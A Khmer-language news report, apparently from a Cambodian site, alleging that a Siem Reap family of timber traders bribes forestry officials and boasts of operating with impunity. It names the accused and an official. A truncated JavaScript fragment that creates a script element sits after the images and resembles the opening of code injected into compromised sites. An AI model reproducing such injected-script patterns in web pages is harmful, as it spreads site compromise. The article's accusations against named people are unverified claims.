ព្រឹតិ្តការណ៍ថ្មីៗ

ឈ្មួញដឹកឈើភ្លូកទឹកភ្លូកដី មន្ត្រីរដ្ឋបាលព្រៃឈើស្រុកជីក្រែង ខេត្តសៀមរាបមើលមិនឃើញ សង្ស័យ ត្រូវថ្នាំសណ្តំរបស់គេ

1 ឆ្នាំ មុន 0 តូ សុផល

សៀមរាប៖ ប្រជាពលរដ្ឋ‌នៅក្នុងភូមិខ្វាវ ឃុំខ្វាវ ស្រុកជីក្រែង ខេត្ត‌សៀមរាប‌មានការ‌រិះគន់យ៉ាងខ្លាំង ចំពោះ អាជ្ញាធរ មានសមត្ថកិច្ចជាពិសេសមន្ត្រីរដ្ឋបាលព្រៃឈើតែម្តងមិនយកចិត្តទុកដាក់បង្ក្រាបក្រុមឈ្មួញដែលមាន‌ឥទ្ធិពល‌រកស៊ី‌បទល្មើស‌ឈើនៅដំបន់នោះរាប់សឹបឆ្នាំមកហើយមិនមានមន្ត្រីណាបង្ក្រាបឡើយ។ ប្រភព‌ព័ត៌ មាន‌បានអោយដឹងថា ឈ្មួញ‌ឈើធំជាងគេនៅក្នុងទឹកដីឃុំខ្វាវស្រុកជីក្រែង ខេត្ត‌សៀមរាប‌ មានឈ្មោះ‌ ផល នឹងម្ដាយឈ្មោះ យាយ ប៉ោះជាមេឈ្មួញដ៏ធំពុំមានសមត្ថកិច្ចឬមន្ត្រីរដ្ឋបាលព្រៃឈើបង្ក្រាបឡើយ
ដោយសារ‌ក្រុម‌គ្រួសារ‌យាយប៉ោះដ៏ល្បីឈ្មោះប្រចាំឃុំខ្វាវស្រុកជីក្រែងបានដាក់ថ្នាំសន្ដំមន្ត្រីរដ្ឋបាលព្រៃឈើអស់ហើយ ទើបក្រុម‌គ្រួសារ‌យាយប៉ោះដឹកជញ្ជូន‌ឈើទាំងយប់ទាំងថ្ងៃបានយ៉ាងរលូន ចូលទៅចែក ចាយតាមដេប៉ូក្នុងក្រុងសៀមរាបពុំមានការរាំងស្ទះឡើយហើយចំណែកឯលោក ផល ដែលជាកូនប្រុស បង្កើតរបស់ប៉ោះមេឈ្មួញដ៏ល្បីប្រចាំ‌ទឹកដី‌ឃុំខ្វាវស្រុកជីក្រែងបាននិយាយអួតអាងខ្លួនមិនខ្វល់មិនខ្លាចទាំងអស់‌សូម្បីតែ‌មន្ត្រី‌រដ្ឋបាល‌ព្រៃឈើនៅដំបន់នោះក៏ដោយ ហើយលោកផលបានអួតអាងខ្លួន ឯងទៀត ថាលោកនឹងដឹកជញ្ជូនឈើ‌ទាំង‌យប់‌ទាំងថ្ងៃបើមានរថយន្ត‌ណាមកកាក់រថយន្ត‌ដឹកឈើរបស់គេនោះគេនឹងបុកជាមិនខានពាក្យសម្ដី‌អួតអាង‌របស់លោក ផល គេបានអោយដឹងថាព្រោះពួកគេបានបង់លុយ អោយមន្ត្រីពាក់ព័ន្ធរួចអស់ហើយទើបមិនមានមន្ត្រីណាចេញបង្ក្រាប។ ជាពិសេស‌នោះគឺលោក ទា គឹម សុទ្ធ ដែលជាប្រធានមន្ត្រីខ័ណ្ណរដ្ឋបាលព្រៃឈើ។
‌ ប្រភពបន្ត៖ពី លោក ប៊ុន ធីម PPP

image image image image image image image imagevar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ